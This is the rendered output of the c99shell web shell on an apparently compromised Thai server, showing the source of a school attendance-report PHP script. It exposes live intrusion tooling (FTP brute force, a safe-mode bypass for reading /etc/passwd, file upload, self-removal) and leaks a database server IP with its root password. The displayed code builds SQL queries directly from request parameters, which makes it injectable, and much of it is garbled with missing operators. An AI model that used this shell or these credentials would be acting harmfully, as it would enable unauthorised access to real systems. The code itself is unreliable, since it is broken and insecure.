!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     report.php (11.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
    session_start();
    
    /**  Define Validate Access  */
    define'_VALID_ACCESS');

    /**  Check Session User Login  */
    if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        /**  Configuration  */
        require_once( "../configuration.php" );
        require_once( $_Config_absolute_path "/includes/framework.php" );
        require_once( "../include/Function.php" );
            
            /**  using 'Att' DB  */
         include("../class/conn.php");
        include("../include/config.inc.php");
        
    
    /**  Create Database Object  */
    $dbObj = new DBConn;
    ConnectDB();
        
    
    
    $month = ($_REQUEST['month'])?$_REQUEST['month']:date("n");
    $year = ($_REQUEST['year'])?$_REQUEST['year']:date("Y")+543;
    $this_month  getDate(mktime(000$month1$year-543));
    $next_month  getDate(mktime(000$month 11$year-543));
    $days_in_this_month floor(($next_month[0] - $this_month[0]) / (60 60 24));

    $sql "select * from TimeSchedule where scheduleName = 'Early'";
    $link->query($sql);
    $rs $link->getnext();
    $earlyTimeStart $rs->timeStart;
    $earlyTimeFinish $rs->timeFinish;
    
    $sql "select * from TimeSchedule where scheduleName = 'Late'";
    $link->query($sql);
    $rs $link->getnext();
    $lateTimeStart $rs->timeStart;
    $lateTimeFinish $rs->timeFinish;
    
    $sql "select * from TimeSchedule where scheduleName = 'Leave'";
    $link->query($sql);
    $rs $link->getnext();
    $leaveTimeStart $rs->timeStart;
    $leaveTimeFinish $rs->timeFinish;
    
    } # else
?>

<? //if(isset($_REQUEST['reportType']) && $_REQUEST['reportType'] == "month"){

        $sql "select * from UserType where userTypeID = '".$_REQUEST['usertype']."'";
        $link->query($sql);
        $rs $link->getnext();
?>
<form name="report" method="post" onsubmit="return validateReportPersonForm()">
  <table width="600" border="0" class="admintable">
  <tr>
    <td height="48" colspan="4" align="center">
        <span class="menu">
            <? if(isset($_REQUEST['month']) && isset($_REQUEST['year']) && isset($_REQUEST['person'])){
                    $sql "select * from USERINFO where Badgenumber = '".$_REQUEST['person']."' ";
                    $link->query($sql);
                    $rs $link->getnext();
            ?>
                    รายงาน <?=$rs->Name;?>  เดือน <?=($_REQUEST['month'])?$ThaiMonth[$_REQUEST['month']-1]:$ThaiMonth[date("n")-1]?> <?=$year;?>
            <? }
                else{
            ?>
                    รายงานแยกตามรายบุคคล
            <? }?>
            
        </span>
    </td>
  </tr>  
  <tr>
    <td width="20%" height="50">&nbsp;</td>
    <td width="51%" align="right" valign="middle">
        <select name="person">
            <? 
                echo "<option value=\"\">----- เลือกรายชื่อ -----</option>";
                $sql "select * from USERINFO where userTypeID = '".$_REQUEST['usertype']."' and userStatusID = '1' order by Name ";
                $link->query($sql);
                while($rs $link->getnext()){
                    echo "<option value='".$rs->Badgenumber."' ".(($person == $rs->Badgenumber)?"selected":"").">".$rs->Name."</option>";                    
                }
            ?>
        </select>
        <select name="month">
            <? 
                for($i=0;$i<sizeof($ThaiMonth);$i++){
                    echo "<option value='".($i+1)."' ".(($month == $i+1)?"selected":"").">".$ThaiMonth[$i]."</option>";                    
                }
            ?>
        </select>
      <input type="text" name="year" value="<?=$year;?>"  size="4" maxlength="4"/>    </td>
    <td width="10%" align="left" valign="middle">
        <input type="submit" value="ค้นหา" style="cursor:pointer"/>
        <input type="hidden" name="status" value="<?=$_REQUEST['status']?>"/>
        <input type="hidden" name="option" value="report"/>
        <input type="hidden" name="reportType" value="person"/>
        <input type="hidden" name="usertype" value="<?=$_REQUEST['usertype']?>"/>
    </td>
    <td width="19%" align="left" valign="middle">
        <? if(isset($_REQUEST['month']) && isset($_REQUEST['year']) && isset($_REQUEST['status'])){?>
        <a href="reportExcel.php?month=<?=$_REQUEST['month']?>&year=<?=$_REQUEST['year']?>&usertype=<?=$_REQUEST['usertype']?>&person=<?=$_REQUEST['person']?>&reportType=person" target="_blank"><img src="images/ico_excel.gif" border="0" title="ดาวน์โหลด excel"/></a>
        <? }?>    </td>
  </tr>
  </table>
</form>

<table height="30" class="report">    
<? 
    if(isset($_REQUEST['month']) && isset($_REQUEST['year']) && isset($_REQUEST['status'])){
?>
    <tr>
        <td width="160" align="center" valign="middle" class="head">วัน / เดือน  / ปี</td>        
        <td width="120" align="center" valign="middle" class="head">เวลาเข้า</td>
        <td width="120" align="center" valign="middle" class="head">เวลาออก</td>
        <td width="150" align="center" valign="middle" class="head">หมายเหตุ</td>            
    </tr>
<?

        for($i=1;$i<=$days_in_this_month;$i++){
        
            $mssql_conn = new mssqldb();
            $mssql_conn->connect($_config['database']);
            $mssql_conn->selectdb($_config['database']['database']);
            
            $ymd = ($year-543)."-".$month."-".$i;
            $status "";
                
            echo "<tr>";
            echo "<td align=\"center\" valign=\"middle\">".($i." ".$ThaiMonth[$month-1]." ".$year)."</td>";    
            
            $timeSplit explode(":",date("H:i:s",strtotime($lateTimeFinish)));
            $this_date mktime(date("H"),date("i"),date("s"),date("n"),date("j"),date("Y"));
            $select_date mktime($timeSplit[0],$timeSplit[1],$timeSplit[2],date("n",strtotime($ymd)),date("j",strtotime($ymd)),date("Y",strtotime($ymd)));

            $sql "select * from USERINFO , CHECKINOUT where USERINFO.Badgenumber = '".$_REQUEST['person']."' and USERINFO.USERID = CHECKINOUT.USERID and CHECKINOUT.CHECKTIME >= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($earlyTimeStart))."' and CHECKINOUT.CHECKTIME <= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($earlyTimeFinish))."' order by CHECKINOUT.CHECKTIME asc";    
            $mssql_conn->query($sql);

            if($mssql_conn->num_rows()){                
                $rs $mssql_conn->getnext();
                $checkin 1;
                $checkin_time date("H:i" strtotime(substr($rs->CHECKTIME,-7)));  //เข้างานปกติ
            }
            else{
                $sql "select * from USERINFO , CHECKINOUT where USERINFO.Badgenumber = '".$_REQUEST['person']."' and USERINFO.USERID = CHECKINOUT.USERID and CHECKINOUT.CHECKTIME >= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($lateTimeStart))."' and CHECKINOUT.CHECKTIME <= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($lateTimeFinish))."' order by CHECKINOUT.CHECKTIME asc";
                $mssql_conn->query($sql);
                
                if($mssql_conn->num_rows()){                
                    $rs $mssql_conn->getnext();
                    $checkin 2;
                    $checkin_time date("H:i" strtotime(substr($rs->CHECKTIME,-7)));  //เข้างานสาย
                }
                else{    
                    if($select_date $this_date$checkin_time "-";
                    else $checkin_time "ไม่ลงเวลาเข้า";
                    $checkin 3//ขาดงาน
                }
            }    
            echo "<td align=\"center\" valign=\"middle\">".$checkin_time."</td>";
            
            $this_date mktime(date("H"),date("i"),date("s"),date("n"),date("j"),date("Y"));
            $select_date mktime(16,30,0,date("n",strtotime($ymd)),date("j",strtotime($ymd)),date("Y",strtotime($ymd)));
            
            $sql "select * from USERINFO , CHECKINOUT where USERINFO.Badgenumber = '".$_REQUEST['person']."' and USERINFO.USERID = CHECKINOUT.USERID and CHECKINOUT.CHECKTIME >= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($leaveTimeStart))."' and CHECKINOUT.CHECKTIME <= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($leaveTimeFinish))."' order by CHECKINOUT.CHECKTIME desc";
            $mssql_conn->query($sql);
            if($mssql_conn->num_rows()){
                $rs $mssql_conn->getnext();
                $checkout 1//ลงเวลาออก
                $checkout_time date("H:i" strtotime(substr($rs->CHECKTIME,-7)));
                $status "-";
            }
            else{
                if($select_date $this_date){
                    $checkout 3;  //ยังไม่มีข้อมูล
                    $checkout_time "-";
                    $status "-";
                }
                else{
                    $checkout 2;  //ไม่ลงเวลาออก
                    $checkout_time "ไม่ลงเวลาออก";
                }
            }
            echo "<td align=\"center\" valign=\"middle\">".$checkout_time."</td>";
            
            $mysql_conn mysql_connect("202.29.105.4","root","scphc@") or die('Could not connect: ' mysql_error());
            mysql_select_db("manage_db",$mysql_conn);
            mysql_query("SET NAMES 'tis620'");

            $sql "select * from Holiday_SCPHC where holidayDate >= '".date("Y-m-d"strtotime($ymd))."' and holidayDate <= '".date("Y-m-d"strtotime($ymd))."' ";
            $mssql_conn->query($sql);
            if($mssql_conn->num_rows()){
                $rs $mssql_conn->getnext();
                $checkin 10;  //วันหยุดราชการ
                $holidayName $rs->holidayName;
            }                

            $sql "select * from personal_tb , history_absent , history_absent_tb where personal_tb.Acno = '".$_REQUEST['person']."' and personal_tb.Teacher_code = history_absent_tb.Teacher_code and history_absent_tb.Absent_code = history_absent.Absent_code and history_absent_tb.Date_start <= '".($year."-".$month."-".$i)."' and history_absent_tb.Date_finish >= '".($year."-".$month."-".$i)."' and history_absent_tb.Status = 'อนุญาต' ";
            $result mysql_query($sql);

            if(mysql_num_rows($result)){
                $rs2 mysql_fetch_object($result);
                    
                switch($rs2->Absent_code){
                    case $checkin 4; break;  //ลากิจ
                    case $checkin 5; break;  //ลาป่วย
                    case $checkin 6; break;  //ลาพักผ่อน
                    case $checkin 7; break;  //ลาคลอดบุตร
                    case $checkin 8; break;  //ลาอุปสมบท
                }

            }
            else{
                $sql "select * from personal_tb , formaoffice where personal_tb.Acno = '".$_REQUEST['person']."' and personal_tb.Teacher_code = formaoffice.Teacher_code and  formaoffice.Date_start <= '".($year."-".$month."-".$i)."' and formaoffice.Date_finish >= '".($year."-".$month."-".$i)."'   and formaoffice.Flag2 = 'อนุมัติ' ";

                $result mysql_query($sql);

                if(mysql_num_rows($result)) $checkin 9;  //ไปราชการ
            }
            mysql_close($mysql_conn);
                
            $weekend date("w"strtotime($ymd));                    
            $this_day mktime(0,0,0,date("m"),date("d"),date("Y"));
            $compare_day mktime(0,0,0,date("n"strtotime($ymd)),date("d"strtotime($ymd)),date("Y"strtotime($ymd)));

            if($checkin == 4$status "ลากิจ";
            else if($checkin == 5$status "ลาป่วย";
            else if($checkin == 6$status "ลาพักผ่อน";
            else if($checkin == 7$status "ลาคลอดบุตร";
            else if($checkin == 8$status "ลาอุปสมบท";
            else if($checkin == 9$status "ไปราชการ";
            else if($checkin == 10$status $holidayName;
            else{
                if($weekend == 6)  $status "วันเสาร์";
                if($weekend == 0)  $status "วันอาทิตย์";
                if($compare_day $this_day$status "-";
                if($status == "" && $checkin != 3$status "-";
                if($status == "" && $checkin == 3$status "ขาดงาน";
            }
                
            echo "<td align=\"center\" valign=\"middle\">".$status."</td>";
            
            echo "</tr>";
        }
    }
?>
</table>

<? }?>
<?php include("../templates/incFooter.php"); ?>
<?php
    /**  Free Resource */
    $dbObj->freeresult($result);

    /**  Close the Database  */
    $dbObj->disconn();
    CloseDB();
    
    /**  Unset Class  */
    unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0081 ]--